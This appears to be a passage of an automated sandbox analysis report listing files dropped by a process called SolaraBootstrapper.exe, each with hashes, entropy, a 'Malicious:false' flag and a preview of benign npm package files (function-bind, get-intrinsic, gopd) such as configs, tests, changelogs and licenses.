                                                  Preview:{. "name": "function-bind",. "version": "1.1.2",. "description": "Implementation of Function.prototype.bind",. "keywords": [. "function",. "bind",. "shim",. "es5". ],. "author": "Raynos <raynos2@gmail.com>",. "repository": {. "type": "git",. "url": "https://github.com/Raynos/function-bind.git". },. "funding": {. "url": "https://github.com/sponsors/ljharb". },. "main": "index",. "homepage": "https://github.com/Raynos/function-bind",. "contributors": [. {. "name": "Raynos". },. {. "name": "Jordan Harband",. "url": "https://github.com/ljharb". }. ],. "bugs": {. "url": "https://github.com/Raynos/function-bind/issues",. "email": "raynos2@gmail.com". },. "devDependencies": {. "@ljharb/eslint-config": "^21.1.0",. "aud": "^2.0.3",. "auto-changelog": "^2.4.0",. "eslint": "=8.8.0",. "in-publish": "^2.0.1",. "npmignore": "^0.3.0",. "nyc": "^10.3.2",. "safe-publish-latest": "^2.0.0",. "tape": "^5.7.1"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):176
                                                  Entropy (8bit):4.668736421183359
                                                  Encrypted:false
                                                  SSDEEP:3:e5NeVHEiHob/vHHEiAJZ0S9/vHHI0FEmpRERZGbty4nMPW/vJVHL26AXWHfFqv:e5NSHEiILrAXrhq2RI0ty36vJtL2rQG
                                                  MD5:BB3B1AC6315F16027A8E514B44DB203C
                                                  SHA1:186EDBBB64903B71F1C530ED81347CA000B3B673
                                                  SHA-256:63CDAA0CB9C27170EAB17635114928F01E23665054B7AC15538B7BE2FC3EB495
                                                  SHA-512:BB46C3961CB122ADB4C0A9B088A2B8D03D9CFEF64E28F90C078DDB2E0995DD5A27A75AB7A5E13E02A8BECD8F9FF54747A9EDFFB54B68BE1ED4974D479969D5BC
                                                  Malicious:false
                                                  Preview:{.."rules": {..."array-bracket-newline": 0,..."array-element-newline": 0,..."max-statements-per-line": [2, { "max": 2 }],..."no-invalid-this": 0,..."no-magic-numbers": 0,..}.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):8991
                                                  Entropy (8bit):4.374619018777284
                                                  Encrypted:false
                                                  SSDEEP:96:Wi5z1X/zaW/PW2rqETStE6BINAzeQFpmzowYdF9s4/lNdyaud1KpGl:WiJ1ba8Z6WuegpYowsF99NNdPud1WGl
                                                  MD5:9786942AEEFCDC12B2F841895EDE1647
                                                  SHA1:09E08FB38653410A851B6B2FAB5700F93A3B76F2
                                                  SHA-256:32BA00E232DC250A945BDB23461A7346F6029D31B595AA2046BF386AAB6A91E9
                                                  SHA-512:9B919BDC5AF513FF2386951CBA6DA3D5DE9D66D907C4D502788059BB58B518F666FD6C5F044361D6251912D54F842A5C31E7FC8EF6AE04F1D89D68E38071D520
                                                  Malicious:false
                                                  Preview:// jscs:disable requireUseStrict..var test = require('tape');..var functionBind = require('../implementation');.var getCurrentContext = function () { return this; };..test('functionBind is a function', function (t) {. t.equal(typeof functionBind, 'function');. t.end();.});..test('non-functions', function (t) {. var nonFunctions = [true, false, [], {}, 42, 'foo', NaN, /a/g];. t.plan(nonFunctions.length);. for (var i = 0; i < nonFunctions.length; ++i) {. try { functionBind.call(nonFunctions[i]); } catch (ex) {. t.ok(ex instanceof TypeError, 'throws when given ' + String(nonFunctions[i]));. }. }. t.end();.});..test('without a context', function (t) {. t.test('binds properly', function (st) {. var args, context;. var namespace = {. func: functionBind.call(function () {. args = Array.prototype.slice.call(arguments);. context = this;. }). };. namespace.func(1, 2, 3
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):603
                                                  Entropy (8bit):4.743418809624205
                                                  Encrypted:false
                                                  SSDEEP:12:Erz54bz1SnZfN9iIZVtxyeqRkR6FRvwr2reLSxNHH2NLZGsX:Erd4bz16ZfXkeUY6rvwCrem2JJ
                                                  MD5:C02DA4AFD6075E9009CC89DF0485FF87
                                                  SHA1:4FAC42F73CF7F5BB55190EC7A86369FF3E147F1E
                                                  SHA-256:B92CD3F3A532DFAD193110E917A613C1A26273E234A145234363F1E54F27D622
                                                  SHA-512:2BEB5257D29313074D9FE528367766F95222FB6F21F4DDF07131E739F57816D1E376921935464EFC6D3F9D29F88C9CA56F9F8956CA1E3AD1E7B38F89D05E35C2
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."env": {..."es6": true,..."es2017": true,..."es2020": true,..."es2021": true,..."es2022": true,..},..."rules": {..."array-bracket-newline": 0,..."complexity": 0,..."eqeqeq": [2, "allow-null"],..."func-name-matching": 0,..."id-length": 0,..."max-lines": 0,..."max-lines-per-function": [2, 90],..."max-params": [2, 4],..."max-statements": 0,..."max-statements-per-line": [2, { "max": 2 }],..."multiline-comment-style": 0,..."no-magic-numbers": 0,..."sort-keys": 0,..},..."overrides": [...{...."files": "test/**",...."rules": {....."new-cap": 0,....},...},..],.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):584
                                                  Entropy (8bit):4.692655741889681
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMB4elgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mgCVlg7g1GegJ9gEz4D
                                                  MD5:AF4549C7E764D6B75715C3F1001FBA09
                                                  SHA1:63DDFBD389E372A51B629A9C64AE1BAAEC6BE25B
                                                  SHA-256:24CAFAE83831C946115236F57F58E0D4797A3E7F6BCC8AD87B88A69D15A520C6
                                                  SHA-512:F81CD995A21702B797118E0171844842541E93BC461455339B1B1E16181E6E56765316A3CC3B2C816E87D337A15754231405E2510386329F0561733165356FC8
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/get-intrinsic.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):139
                                                  Entropy (8bit):4.461548676043605
                                                  Encrypted:false
                                                  SSDEEP:3:uFx3jG9UDHfa7aBA9c4RIeeFHqpvc9PNUaUifEIkHJ03WhBK:Kw9OfyFdRaB9LUiMIOJHhBK
                                                  MD5:D0104F79F0B4F03BBCD3B287FA04CF8C
                                                  SHA1:54F9D7ADF8943CB07F821435BB269EB4BA40CCC2
                                                  SHA-256:997785C50B0773E5E18BF15550FBF57823C634FEFE623CD37B3C83696402AD0A
                                                  SHA-512:DAF9B5445CFC02397F398ADFA0258F2489B70699DFEC6CA7E5B85AFE5671FDCABE59EDEE332F718F5E5778FEB1E301778DFFE93BB28C1C0914F669659BAD39C6
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):11640
                                                  Entropy (8bit):5.310659923997118
                                                  Encrypted:false
                                                  SSDEEP:192:EgITPRuHtbXe5Dv0IHfKuWDY5KXp9L72d:EngH1O5b0Ufs159Wd
                                                  MD5:92681891DF0037DC97EC7266C832B879
                                                  SHA1:AF20E1513FE522C4FCBA142C8B680B1E2B6EC818
                                                  SHA-256:3F2ACA786DDB5189B3748C4B217CB1FEDDD1F1B1AC40009C01E36E78B15E3598
                                                  SHA-512:744D634AD2BF20A5C95690C3A3696C417F685704D7BFE5340C3767632F7A14B88023151796748D7261828B80CC9815F93111F49066892012403B624CC5FC18EA
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.2.4](https://github.com/ljharb/get-intrinsic/compare/v1.2.3...v1.2.4) - 2024-02-05..### Commits..- [Refactor] use all 7 &lt;+ ES6 Errors from `es-errors` [`bcac811`](https://github.com/ljharb/get-intrinsic/commit/bcac811abdc1c982e12abf848a410d6aae148d14)..## [v1.2.3](https://github.com/ljharb/get-intrinsic/compare/v1.2.2...v1.2.3) - 2024-02-03..### Commits..- [Refactor] use `es-errors`, so things that only need those do not need `get-intrinsic` [`f11db9c`](https://github.com/ljharb/get-intrinsic/commit/f11db9c4fb97d87bbd53d3c73ac6b3db3613ad3b).- [Dev Deps] update `aud`, `es-abstract`, `mock-property`, `npmignore` [`b7ac7d1`](https://github.com/ljharb/get-intrinsic/commit/b7ac7d1616fefb03877b1aed0c8f8d61aad32b6c).- [meta] simplify `
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.099362344791979
                                                  Encrypted:false
                                                  SSDEEP:24:tPsrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:VsaJHlxE3dQHOs5exm3ogFh
                                                  MD5:0EB2C73DAA0ECF037CBDF3D0BB0C98D5
                                                  SHA1:7087A92577C86806338A363A88A9A3B4F762E26D
                                                  SHA-256:39C5EC504CF6BD5CD782A7C695828E09189DF79F5D94840E4F08FEB97B9FD416
                                                  SHA-512:12A2A3BF2ABAFA5E3F669278EE332C87E4A164CFE54EF6019CA8B5F3D41F38F10224D52F471D0256AAD6600DEC9FB3A1EDF3C84F38CC9F1CFD4EB9A2AF8A0066
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2020 Jordan Harband..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2791
                                                  Entropy (8bit):5.1300644620154205
                                                  Encrypted:false
                                                  SSDEEP:48:r1eI4IFO2sfq6M6bvPLGqIEqixViPVGH3Ie+RwxIL0I9IPv:RXFbOvjI2XIPLxqX
                                                  MD5:42F69E4537122E0DD7C9D963A5C0D6BE
                                                  SHA1:1D3D1DA1074299E58E264904B12BB07318C856BC
                                                  SHA-256:15F5365E3E1D4182780423363296E53408FF4254DC958A6E52A05A7DCEE324B4
                                                  SHA-512:80A2B8309960E2CDE280A3A06F95CF1EB0709F2E317AF37EB1AF41A717F9619DB5C3EAC15482A3FEC2DC93E114C3C3C8799AD16D016D689F8077E8DCF1F5A480
                                                  Malicious:false
                                                  Preview:# get-intrinsic <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![dependency status][deps-svg]][deps-url].[![dev dependency status][dev-deps-svg]][dev-deps-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..Get and robustly cache all JS language-level intrinsics at first require time...See the syntax described [in the JS spec](https://tc39.es/ecma262/#sec-well-known-intrinsic-objects) for reference...## Example..```js.var GetIntrinsic = require('get-intrinsic');.var assert = require('assert');..// static methods.assert.equal(GetIntrinsic('%Math.pow%'), Math.pow);.assert.equal(Math.pow(2, 3), 8);.assert.equal(GetIntrinsic('%Math.pow%')(2, 3), 8);.delete Math.pow;.assert.equal(GetIntrinsic('%Math.pow%')(2, 3), 8);..// instance methods.var arr = [1];.assert.equal(GetIntrinsic('%Array.prototype.push%')
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):13615
                                                  Entropy (8bit):5.299667489870541
                                                  Encrypted:false
                                                  SSDEEP:192:1TAxS8+GNVcJHPjETpPuanx+Hyhs1CGZiNZaVlvsoDJOgZMvOwpcdWvyo/fAlrHK:z8+AgWBKdhmEzVlcv/
                                                  MD5:7FD37B7099EB69F0FC8EE86A47F69E16
                                                  SHA1:3E22F15B73CAE1EB4E6F72224190AEB09F784866
                                                  SHA-256:5D72DDB504858C1109FA106FFA9BE744EA99E75F9255F9FF28851562C5EB7031
                                                  SHA-512:42F4CE801DC5C7ED0BC0F1D9559F2706DECE6160999A8D48FDFC77467D986871FC8601B0AE0E3F2C5BC63402F866F441556100805EE7F3FDDEF5BA67DA68A231
                                                  Malicious:false
                                                  Preview:'use strict';..var undefined;..var $Error = require('es-errors');.var $EvalError = require('es-errors/eval');.var $RangeError = require('es-errors/range');.var $ReferenceError = require('es-errors/ref');.var $SyntaxError = require('es-errors/syntax');.var $TypeError = require('es-errors/type');.var $URIError = require('es-errors/uri');..var $Function = Function;..// eslint-disable-next-line consistent-return.var getEvalledConstructor = function (expressionSyntax) {..try {...return $Function('"use strict"; return (' + expressionSyntax + ').constructor;')();..} catch (e) {}.};..var $gOPD = Object.getOwnPropertyDescriptor;.if ($gOPD) {..try {...$gOPD({}, '');..} catch (e) {...$gOPD = null; // this is IE 8, which has a broken gOPD..}.}..var throwTypeError = function () {..throw new $TypeError();.};.var ThrowTypeError = $gOPD..? (function () {...try {....// eslint-disable-next-line no-unused-expressions, no-caller, no-restricted-properties....arguments.callee; // IE 8 does not throw here...
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2414
                                                  Entropy (8bit):5.10585146540838
                                                  Encrypted:false
                                                  SSDEEP:48:oehqPRYCZUPagS4j09yRYsEg47TOsqTWMU1yO1F3fSoAOKjHK8CL:osCS4337TOfTEYO33f4OKjH8
                                                  MD5:322602876E4A7E2716019566CA203F85
                                                  SHA1:13C1C48939DE200BD2C5FA41A90FB9C0588A2EAB
                                                  SHA-256:A8BF389C3F2229E681F007B25AA8FA6BF3641E00DDDA1E101AF4F9E98A9F6199
                                                  SHA-512:85406165CACC77786C1A2CE86AB0BA16F5FAF976C1EB362588CB44DC5CE39E2CACB736DF911DAAAA09CB2BEE96E9A7C2E2651245CCD1516F34E0BA44159421E6
                                                  Malicious:false
                                                  Preview:{.."name": "get-intrinsic",.."version": "1.2.4",.."description": "Get and robustly cache all JS language-level intrinsics at first require time",.."main": "index.js",.."exports": {...".": "./index.js",..."./package.json": "./package.json"..},.."sideEffects": false,.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublish": "not-in-publish || npm run prepublishOnly",..."prepublishOnly": "safe-publish-latest",..."prelint": "evalmd README.md",..."lint": "eslint --ext=.js,.mjs .",..."pretest": "npm run lint",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."type": "git",..."url": "git+https://github.com/ljharb/get-intrinsic.git"..},.."keywords": [..."ja
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):8767
                                                  Entropy (8bit):5.080749188856504
                                                  Encrypted:false
                                                  SSDEEP:192:alPbhVR7/RP/6OPIqyuOoOV8rSlYXLGzdxD:4P/6OgqvjY
                                                  MD5:45EB9D6FC0AA0ABCFAA920EDC317C0E1
                                                  SHA1:7CBB3C83811754D8564EDB3B4EC57509736A3572
                                                  SHA-256:2A2150EAEC22AF67C385BCA31D08FE7D604E9C3EBFC4C2BCDCD6D243E6BA9370
                                                  SHA-512:6B47215BC891A5A55B11FE4ED18E16330044130385858DF3C847AA6EDB8FB7FBD31FB16F9D1DBA97ED4CA3D6DC5BA884F0716667F20E577A73ED3C89693FC960
                                                  Malicious:false
                                                  Preview:'use strict';..var GetIntrinsic = require('../');..var test = require('tape');.var forEach = require('for-each');.var debug = require('object-inspect');.var generatorFns = require('make-generator-function')();.var asyncFns = require('make-async-function').list();.var asyncGenFns = require('make-async-generator-function')();.var mockProperty = require('mock-property');..var callBound = require('call-bind/callBound');.var v = require('es-value-fixtures');.var $gOPD = require('gopd');.var DefinePropertyOrThrow = require('es-abstract/2021/DefinePropertyOrThrow');..var $isProto = callBound('%Object.prototype.isPrototypeOf%');..test('export', function (t) {..t.equal(typeof GetIntrinsic, 'function', 'it is a function');..t.equal(GetIntrinsic.length, 2, 'function has length of 2');...t.end();.});..test('throws', function (t) {..t['throws'](...function () { GetIntrinsic('not an intrinsic'); },...SyntaxError,...'nonexistent intrinsic throws a syntax error'..);...t['throws'](...function () { GetI
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):224
                                                  Entropy (8bit):4.746913910657882
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hf5NeVHDQL+6pZjJNHeOL+/FpHIcR7GTIGDJVHLL8/EzlvwR/6G+sNqc:ExL0UxNSHadXnL2pkzVtLL8alJbupsg3
                                                  MD5:AF5725E1E58526F93F37C687FE2D433E
                                                  SHA1:9CA2A66D62BD687C3D18C51217BFE37280256EC1
                                                  SHA-256:F441CE02CF8246250BE17C235FC77A2F674A6E538847C3C8B0639377EFB253E8
                                                  SHA-512:AC2C141B3D9217C6470DBA504746EE65C38D265E22A0550D82F9677CAAD19A29A4B73A801F11C4CFA5C981E8C82B936F8525176226B22E6421D7515A7AA85071
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."func-style": [2, "declaration"],..."id-length": 0,..."multiline-comment-style": 0,..."new-cap": [2, {...."capIsNewExceptions": [....."GetIntrinsic",....],...}],..},.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):575
                                                  Entropy (8bit):4.69908389967272
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggM40lgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mgN0lg7g1GegJ9gEz4D
                                                  MD5:4B9E776D4FFEB21D1FB58AC86E4F6B46
                                                  SHA1:D4C6E2017B8DC882802F56BE442ABC18E9D0F984
                                                  SHA-256:14A29231A020201285CEC832F4D4C90B7296BC45F9117E3F2A28C5E51A430CAE
                                                  SHA-512:08A003C4D1EB83895C2971A79FEE09EE5D2A37CD0AA48FAB23DA6C254EB4F0DF02122B93693EF723CDE0608CE501342F9FF8C1158BCE99AFBAA25209665C9001
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/gopd.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1541
                                                  Entropy (8bit):5.321658294372765
                                                  Encrypted:false
                                                  SSDEEP:24:EIKpjXWTIpphfdk/alyefGICTYX7wwcHEPsoXdfPDcqCNl95E7hq:E5yEpZ72iojqfA71
                                                  MD5:4064EDED5329E868D21E4F024477FB53
                                                  SHA1:D1B7E22BDB8D8C73F7BB1870C8BA48A5DED5DDEA
                                                  SHA-256:78E99FF5F94FC0EEEAAE349B4392B432D7AF11ACB62A9F965A970F37465C93A8
                                                  SHA-512:6E643713A9E2259B6C66C13DD032D72A1C2314B28E62696B543FEA7F60071C504CD9C17ACAB2124EE511D596BAE59E6A82530E5FD7262B56BE3564222E12F89F
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.0.1](https://github.com/ljharb/gopd/compare/v1.0.0...v1.0.1) - 2022-11-01..### Commits..- [Fix] actually export gOPD instead of dP [`4b624bf`](https://github.com/ljharb/gopd/commit/4b624bfbeff788c5e3ff16d9443a83627847234f)..## v1.0.0 - 2022-11-01..### Commits..- Initial implementation, tests, readme [`0911e01`](https://github.com/ljharb/gopd/commit/0911e012cd642092bd88b732c161c58bf4f20bea).- Initial commit [`b84e33f`](https://github.com/ljharb/gopd/commit/b84e33f5808a805ac57ff88d4247ad935569acbe).- [actions] add reusable workflows [`12ae28a`](https://github.com/ljharb/gopd/commit/12ae28ae5f50f86e750215b6e2188901646d0119).- npm init [`280118b`](https://github.com/ljharb/gopd/commit/280118badb45c80b4483836b5cb5315bddf6e582).- [meta]
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.09865750118585
                                                  Encrypted:false
                                                  SSDEEP:24:vPsrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:3saJHlxE3dQHOs5exm3ogFh
                                                  MD5:8478C87D16770F6D32A4578C475D3930
                                                  SHA1:B79B2B51CBE42EC655277435B863EF9BA840840D
                                                  SHA-256:D90BF0A089DA4CF43D644ED240A0B3825DCDB705E64E38371D56995A4CC9E4C5
                                                  SHA-512:CD259994F307A9DAD872ED222A7D03649EC453C3C75ACC8EB180BE9B62F84D1830CEF53EF57B22F030A0A95A0CB77C5CA32BC6099A74E5D18E6EDFB7C6C84B07
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2022 Jordan Harband..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1562
                                                  Entropy (8bit):5.0755714224286335
                                                  Encrypted:false
                                                  SSDEEP:48:Us1eI4I7qu29BtJmpzmXpmumM6NIL0IbIJv:xXFerLxsh
                                                  MD5:B7828C6A2AAEB53E9BD62E7A166D4057
                                                  SHA1:4E879D6C22E3B544119ACE482CC212D9DAC24075
                                                  SHA-256:A5ADDA11EB1B5C4A225289CCC2E1F01BDC27E1635B85039AD327EC37082AD3D4
                                                  SHA-512:BDEF4055F74D4AF6337EED4D23C1764F97544AD21616E40D2750AF64A73EE00FEB781BC9C82B132C3D518BF870C4021C1769F4F16347C8DB66D12485984350B2
                                                  Malicious:false
                                                  Preview:# gopd <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..`Object.getOwnPropertyDescriptor`, but accounts for IE's broken implementation...## Usage..```javascript.var gOPD = require('gopd');.var assert = require('assert');..if (gOPD) {..assert.equal(typeof gOPD, 'function', 'descriptors supported');..// use gOPD like Object.getOwnPropertyDescriptor here.} else {..assert.ok(!gOPD, 'descriptors not supported');.}.```..[package-url]: https://npmjs.org/package/gopd.[npm-version-svg]: https://versionbadg.es/ljharb/gopd.svg.[deps-svg]: https://david-dm.org/ljharb/gopd.svg.[deps-url]: https://david-dm.org/ljharb/gopd.[dev-deps-svg]: https://david-dm.org/ljharb/gopd/dev-status.svg.[dev-deps-url]: https://david-dm.org/ljharb/gopd#info=devDependencies.[npm-badge-png]
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):263
                                                  Entropy (8bit):5.064926684744617
                                                  Encrypted:false
                                                  SSDEEP:6:QmRQgNMmlCOqRs0r9xNp8j4M8pCL9y1OKCqxb3IYBSp:9RQt0CRLP41y1Fb3DBW
                                                  MD5:9D619A4BC9CBF4F8F3A9F735F88ACCE2
                                                  SHA1:5592E1ECB644F9C2BBE2C51F5EBFA3D95B76BEEF
                                                  SHA-256:1D34BF8FD50315AD79BF71163475B928721295361A3D2DAE52D988B9EA4FD09A
                                                  SHA-512:B98A3F32A0F2197F27D2B3EF65F40E5CB1ED54E06F617C54419B4B49FCA691DAA844B29204928AA544D94F78A5C69CC90ED63A04AB4A10C4829DD7AC067CF1E7
                                                  Malicious:false
                                                  Preview:'use strict';..var GetIntrinsic = require('get-intrinsic');..var $gOPD = GetIntrinsic('%Object.getOwnPropertyDescriptor%', true);..if ($gOPD) {..try {...$gOPD([], 'length');..} catch (e) {...// IE 8 has a broken gOPD...$gOPD = null;..}.}..module.exports = $gOPD;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1877
                                                  Entropy (8bit):5.137804769758442
                                                  Encrypted:false
                                                  SSDEEP:24:H1ohEWhXRYCQwdDC9YHM4FSyF1agI8c2sfAk21x60RZ1x6/Qy7s7XQJi4n9Jp5YS:VuXRYCZU547ag/fyORYsEg49KsNSowg
                                                  MD5:DECFDB3EE3A3A8AC4460E083201FF8B2
                                                  SHA1:C243EFD2585DB26B0A7C6C6B399BE0DB9E5CD7E1
                                                  SHA-256:493A85E0F38390E60D37100347AEE54546895501B20189F7EDEAF3FBBEBF0B35
                                                  SHA-512:A32F0A14FFA32C205970333645A24FD353E42A965572A70826A45D1CE145A0D41DDDC1C9100DA8DD798AC5F785385E6D0F4C5E9E82F87C10DF4E63AD8C342A44
                                                  Malicious:false
                                                  Preview:{.."name": "gopd",.."version": "1.0.1",.."description": "`Object.getOwnPropertyDescriptor`, but accounts for IE's broken implementation.",.."main": "index.js",.."exports": {...".": "./index.js",..."./package.json": "./package.json"..},.."sideEffects": false,.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublishOnly": "safe-publish-latest",..."prepublish": "not-in-publish || npm run prepublishOnly",..."lint": "eslint --ext=js,mjs .",..."postlint": "evalmd README.md",..."pretest": "npm run lint",..."tests-only": "tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."type": "git",..."url": "git+https://github.com/ljharb/gopd.git"..},.."keywords": [..."ecmascript",..."javascr
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):590
                                                  Entropy (8bit):4.896123540064039
                                                  Encrypted:false
                                                  SSDEEP:6:QcALX5reM2oa1QkksGKdaqXsfvvNhaL4YeqCaQPlFQEhstTewFR5S2X9R5a14eXO:jSXjpqev3M7FnZnWTg9mkg1sPGIOLW
                                                  MD5:2F21A47D1AEC7859A16C9F9143DDF71C
                                                  SHA1:38AFFD0A6D7B23D1C4D7ACF7DF73338B7FA7F66C
                                                  SHA-256:2FCD53FBC59F2998519995F4425A9F1CC2B1A3657B30896A5D0DFCC00D02BD80
                                                  SHA-512:2DE6286741C151B4D0B980A5D84076D77DD147187CDB6440223A76232B9789710D2E13B508386FC0590C8356326CEE407FA524173B0BFAAD634F199FCBE4B5F5
                                                  Malicious:false
